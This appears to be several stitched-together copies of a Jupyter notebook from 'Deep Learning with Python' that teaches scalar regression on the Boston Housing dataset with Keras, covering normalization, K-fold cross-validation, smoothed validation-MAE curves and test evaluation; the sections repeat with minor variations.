Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
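###Markdown
Since the targets are in thousands of dollars, the test MAE translates directly into an average dollar error; a small illustrative conversion using the score computed above:
###Code
# e.g. a test MAE of 2.6 would mean predictions are off by about $2,600 on average.
print('Off by about ${:,.0f} on average'.format(test_mae_score * 1000))
###Output
_____no_output_____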
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
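###Markdown
A quick numerical summary of the targets (values are in thousands of dollars); a small illustrative addition:
###Code
# Minimum, maximum and mean of the training-set median home prices.
print(train_targets.min(), train_targets.max(), train_targets.mean())
###Output
_____no_output_____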
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
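###Markdown
As a quick sanity check (not in the original text), we can instantiate the model once and print its layer structure and parameter counts:
###Code
# Inspect the architecture: 13 inputs -> Dense(64) -> Dense(64) -> Dense(1)
build_model().summary()
###Output
_____no_output_____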
###Markdown
Our network ends with a single unit and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression, i.e. regression where we are trying to predict a single continuous value. Applying an activation function would constrain the range the output can take; for instance, if we applied a `sigmoid` activation to the last layer, the network could only learn to predict values between 0 and 1. Because the last layer is purely linear, the network is free to learn to predict values in any range.

Note that we compile the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.

We also monitor a new metric during training: `mae`, Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average.

## Validating our approach using K-fold validation

To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we did in our previous examples. However, because we have so few data points, the validation set would end up being very small (about 100 examples). As a consequence, our validation scores could change a lot depending on which data points we choose for validation and which for training: the validation scores would have a high _variance_ with regard to the validation split, which would prevent us from reliably evaluating our model.

The best practice in such situations is K-fold cross-validation. It consists of splitting the available data into K partitions (typically K = 4 or 5), instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model is then the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
    # Prepare the validation data: data from partition #i
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
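###Markdown
The manual slicing above is exactly what scikit-learn's `KFold` splitter automates. The following sketch, which is not from the original text, expresses the same evaluation loop with `KFold`, reusing the `build_model`, `train_data`, `train_targets` and `num_epochs` defined above:
###Code
# Same K-fold evaluation written with scikit-learn's KFold splitter (sketch).
from sklearn.model_selection import KFold

kf = KFold(n_splits=4)
fold_maes = []
for train_idx, val_idx in kf.split(train_data):
    model = build_model()
    model.fit(train_data[train_idx], train_targets[train_idx],
              epochs=num_epochs, batch_size=1, verbose=0)
    _, val_mae = model.evaluate(train_data[val_idx], train_targets[val_idx], verbose=0)
    fold_maes.append(val_mae)
print(np.mean(fold_maes))
###Output
_____no_output_____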
###Markdown
As you can see, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single one of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000.

Let's try training the network a bit longer: 500 epochs. To keep a record of how well the model does at each epoch, we will modify the training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
    # Prepare the validation data: data from partition #i
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
    # Note: newer Keras / tf.keras versions name this key 'val_mae'
    # instead of 'val_mean_absolute_error'.
    mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
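###Markdown
Equivalently (not in the original text), the fold histories can be stacked and averaged along the fold axis with a single NumPy call:
###Code
# all_mae_histories has shape (k, num_epochs) once converted to an array,
# so averaging over axis 0 gives the per-epoch mean across folds.
average_mae_history_np = np.mean(all_mae_histories, axis=0)
###Output
_____no_output_____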
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:

* Omit the first 10 data points, which are on a different scale from the rest of the curve.
* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, validation MAE stops improving significantly after about 80 epochs; past that point, we start overfitting.

Once we are done tuning the other parameters of the model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
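###Markdown
Instead of hard-coding 80 epochs read off the plot, you could also let Keras stop training automatically with an `EarlyStopping` callback on a held-out split. This is a sketch of that alternative setup, not part of the original text:
###Code
# Alternative to hand-picking the epoch count (sketch): hold out 20% of the
# training data and stop once the validation loss stops improving.
from keras.callbacks import EarlyStopping

model_es = build_model()
model_es.fit(train_data, train_targets,
             epochs=500, batch_size=16, verbose=0,
             validation_split=0.2,
             callbacks=[EarlyStopping(monitor='val_loss', patience=10)])
###Output
_____no_output_____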
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars: The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
print(train_data[0:2])
print(train_data[0:2].shape)
print(train_data[:2].mean(axis=0))
print(train_data[:2].mean(axis=0).shape)
mean = train_data.mean(axis=0) #NOTE: This scales for each feature separately
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
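###Markdown
As a cross-check (a sketch, not part of the original notebook; it assumes scikit-learn is available), the same feature-wise normalization can be expressed with `StandardScaler`, which stores the training mean and standard deviation and reuses them for the test set.
###Code
from sklearn.preprocessing import StandardScaler
# On the raw arrays this reproduces the manual mean/std code above.
# Here train_data has already been standardized in place, so the transform
# is essentially a no-op (mean ~0, std ~1 before and after).
scaler = StandardScaler()
train_scaled = scaler.fit_transform(train_data) # fit on training data only
test_scaled = scaler.transform(test_data) # reuse the training statistics
print(train_scaled.mean(axis=0).round(3))
print(train_scaled.std(axis=0).round(3))
###Output
_____no_output_____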
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our network: Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64,
activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64,
activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance, if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range. Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems. We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validation: To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model. The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k # Around 101 samples available in each fold
num_epochs = 100
mae_scores = []
mse_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
# This training data excludes the val_data but includes the other 3 splits
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
mae_scores.append(val_mae)
mse_scores.append(val_mse)
import matplotlib.pyplot as plt
plt.bar(range(k), mae_scores)
plt.xticks(range(k))
plt.xlabel("Fold (k)")
plt.ylabel("MAE")
plt.title("MAE scores for each fold");
mae_scores
mse_scores
###Output
_____no_output_____
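###Markdown
For reference (a sketch, not part of the original notebook; it assumes scikit-learn is available): with 404 samples and `shuffle=False`, `sklearn.model_selection.KFold` produces exactly the same four contiguous partitions of 101 samples as the manual slicing above; each fold would then be trained and evaluated with `build_model()` as in the loop.
###Code
from sklearn.model_selection import KFold
kf = KFold(n_splits=k, shuffle=False)
for fold, (train_idx, val_idx) in enumerate(kf.split(train_data)):
# Same partitions as the manual slicing: fold i validates on rows
# [i * 101, (i + 1) * 101).
print(f"fold {fold}: train={len(train_idx)} samples, "
f"val rows {val_idx[0]}-{val_idx[-1]}")
###Output
_____no_output_____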
###Markdown
As you can see, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single one of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
k=4
num_epochs = 500
fold_epoch_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
fold_epoch_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
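###Markdown
Training every fold for a fixed 500 epochs is wasteful once the validation MAE stops improving. As an alternative (a sketch, not part of the original notebook), an `EarlyStopping` callback can halt training and restore the best weights, assuming the validation metric is reported as `val_mae` as in the history keys used above.
###Code
from keras.callbacks import EarlyStopping
# Sketch: stop once val_mae has not improved for 20 epochs and keep the
# weights from the best epoch. Shown on the last fold's split from the loop above.
early_stop = EarlyStopping(monitor='val_mae', patience=20,
restore_best_weights=True)
model = build_model()
model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0,
callbacks=[early_stop])
###Output
_____no_output_____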
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
plt.figure(figsize = (10, 8))
plt.plot(range(num_epochs), fold_epoch_mae_histories[0], label="Fold 0")
plt.plot(range(num_epochs), fold_epoch_mae_histories[1], label="Fold 1")
plt.plot(range(num_epochs), fold_epoch_mae_histories[2], label="Fold 2")
plt.plot(range(num_epochs), fold_epoch_mae_histories[3], label="Fold 3")
plt.legend()
plt.title(f"MAE evolution for each fold \n Average MAE across folds is {np.round(np.mean(fold_epoch_mae_histories),3)}");
average_mae_history = [
np.mean([x[i] for x in fold_epoch_mae_histories]) for i in range(num_epochs)]
len(average_mae_history)
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Average Validation MAE across the 4 folds')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:
* Omit the first 10 data points, which are on a different scale from the rest of the curve.
* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
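###Markdown
A quick equivalence check (a sketch, assuming pandas is available): `smooth_curve` with `factor=0.9` is the same recursion as an exponential moving average with `alpha=0.1`, so `pandas.Series.ewm` produces an identical curve.
###Code
import pandas as pd
# s[t] = 0.9 * s[t-1] + 0.1 * x[t], with s[0] = x[0] -- same as smooth_curve above.
ema = pd.Series(average_mae_history[10:]).ewm(alpha=0.1, adjust=False).mean()
plt.plot(range(1, len(ema) + 1), ema)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE (EMA-smoothed)')
plt.show()
###Output
_____no_output_____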
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting. Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
4/4 [==============================] - 0s 1ms/step - loss: 17.4068 - mae: 2.6116
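###Markdown
As a final sanity check (a sketch, not part of the original notebook): generate price predictions for a few test samples with the trained model and compare them to the true targets, both in thousands of dollars.
###Code
predictions = model.predict(test_data[:5])
for pred, target in zip(predictions.flatten(), test_targets[:5]):
print(f"predicted: {pred:6.2f}  actual: {target:6.2f}")
###Output
_____no_output_____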
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follows:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
